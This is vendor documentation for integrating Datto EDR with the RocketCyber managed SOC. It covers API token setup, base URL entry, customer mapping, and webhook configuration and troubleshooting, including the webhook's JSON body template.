Configuring the RocketCyber - EDR integration
NAVIGATION 
> Admin > Users & Tokens > API Tokens
NAVIGATION > Admin > Webhooks
SECURITY Datto EDR subscription with administrator-level platform access
SECURITY Provider-level access to RocketCyber
RocketCyber Managed Security Operations Center (SOC) provides a 24/7 team of security analysts that detect and respond to threats across endpoints, networks, and cloud attack vectors, enabling IT professionals to cut through the noise and focus on critical issues that need remediating. Round-the-clock monitoring eliminates the need to recruit and staff highly-compensated cyber engineers to detect, triage, and examine the mountains of threat data from various point solutions. Skilled SOC analysts escalate only critical action items. RocketCyber’s automated remediation and isolation technologies provide guidance and apply remedies to quarantine a compromised endpoint on the network until it is vetted clean.
This article describes the steps to integrate RocketCyber with your EDR instance.
Prerequisites
To set up the RocketCyber integration, you'll need
-
Administrator-level permissions in both Datto EDR and RocketCyber.
-
webhooks that will send critical alert information to the RocketCyber SOC.
-
the base URL for your Datto EDR instance.
-
an API token for dedicated use with RocketCyber.
Procedure
Datto EDR configuration
-
Within the EDR platform, navigate to
> Admin > Users & Tokens > API Tokens. -
Create a dedicated API token for dedicated use with RocketCyber. Refer to Generating Datto EDR API tokens.
-
Make a note of the API token you created and the base URL of your EDR instance. For example, if the URL of your instance is https://harknessindustries.infocyte.com, your base URL is harknessindustries.infocyte.com.
NOTE The API key expires one year after creation. You will need to refresh the key at least once a year to ensure continued integration.
-
Proceed to RocketCyber configuration.
RocketCyber configuration
-
From within your RocketCyber instance, navigate to Integrations > Endpoint Security > Datto EDR.
-
The Datto EDR configuration tab will load.
-
In the Enter your Datto Access Token field, input the API token you created in EDR.
-
In the Enter your Datto EDR base URL field, input the URL of your Datto EDR instance, followed by /api. For example, if the base URL of your instance is harknessindustries.infocyte.com, the URL you should enter is https://harknessindustries.infocyte.com/api.
-
Click Check Credentials, and then click the Authenticate button to validate the handshake between your RocketCyber and Datto EDR instances and retrieve your managed locations. After successfully authenticating, a webhook will generate within Datto EDR so that it can send telemetry to RocketCyber. Do not change this webhook's settings unless it did not generate correctly.
If you configured the integration, but see no data coming across when an event is triggered in Datto EDR, verify that the webhook was created properly. Refer to Creating Datto EDR webhooks for further details.
-
The customer mapping section will load, enabling you to map your Datto EDR sites and customers to RocketCyber. Perform any necessary mapping. Then, click Save Map.
IMPORTANT One site can be assigned to one RocketCyber customer. In the standalone version of Datto EDR, ensure that each customer is contained within one site. For the Datto RMM integrated version, you will map each customer to their corresponding site, which will appear in the customer mapping section.
-
Navigate to your RocketCyber dashboard. A new Datto EDR widget will be present. Click Review.
-
Events generated by Datto EDR will be visible to RocketCyber. The SOC will be able to monitor events and create incidents to help you stay on top of your alerts.
Troubleshooting
If you see events in Datto EDR, but they are not populating in RocketCyber, you can perform the following steps to ensure that the webhook generated correctly and that there are no errors being logged.
-
Navigate to
> Admin > Webhooks. -
Locate the webhook named RocketCyber-integration and select it.
-
Ensure that all aspects of its configuration match the following:
Method: POST
URL:
-
If you are using app.rocketcyber.com (US instance): https://web-receiver-us.herokuapp.com/api/datto_edr.
-
If you are using eu.rocketcyber.com (EU instance): https://web-receiver-eu.herokuapp.com/api/datto_edr.
-
Headers: Content-Type=application/json
-
Body: Paste the below block into the body to ensure that all fields are sent to RocketCyber.
{
"targetId": "{{targetGroupId}}",
"rmmSiteId": "{{rmmSiteId}}",
"rmmAccountId": "{{rmmAccountId}}",
"data": "{{data}}",
"instance": "{{instance}}",
"id": "{{id}}",
"itemType": "{{type}}",
"hostScanID": "{{hostScanId}}",
"alertType": "{{sourceType}}",
"name": "{{name}}",
"commandLine": "{{commandLine}}",
"threatName": "{{threatName}}",
"threatScore": "{{threatScore}}",
"threatWeight": "{{threatWeight}}",
"hostName": "{{hostname}}",
"flag": "{{flagName}}",
"flagId": "{{flagId}}",
"flagColor": "{{flagColor}}",
"flagName": "{{flagName}}",
"flagWeight": "{{flagWeight}}",
"avScore": "{{avPositives}}/{{avTotal}}",
"itemId": "{{itemId}}",
"createdOn": "{{createdOn}}",
"avScan": "{{hasAvScan}}",
"description": "{{description}}",
"sourceId": "{{sourceId}}",
"severity": "{{severity}}",
"sourceName": "{{sourceName}}",
"link": "{{link}}",
"scanId": "{{scanId}}",
"fileRepId": "{{fileRepId}}",
"signed": "{{signed}}",
"managed": "{{managed}}",
"avPositives": "{{avPositives}}",
"avTotal": "{{avTotal}}",
"hasAvScan": "{{hasAvScan}}",
"synapse": "{{synapse}}",
"staticAnalysis": "{{staticAnalysis}}",
"suspicious": "{{suspicious}}",
"whitelist": "{{whitelist}}",
"blacklist": "{{blacklist}}",
"localWhitelist": "{{localWhitelist}}",
"localBlacklist": "{{localBlacklist}}",
"unknown": "{{unknown}}",
"notMalicious": "{{notMalicious}}"
}
-
If the webhook appears to be configured correctly, but you are having trouble receiving events from Datto EDR, click the tri-dot menu to the right of the webhook and select View Errors to see if there are any communication errors logged.
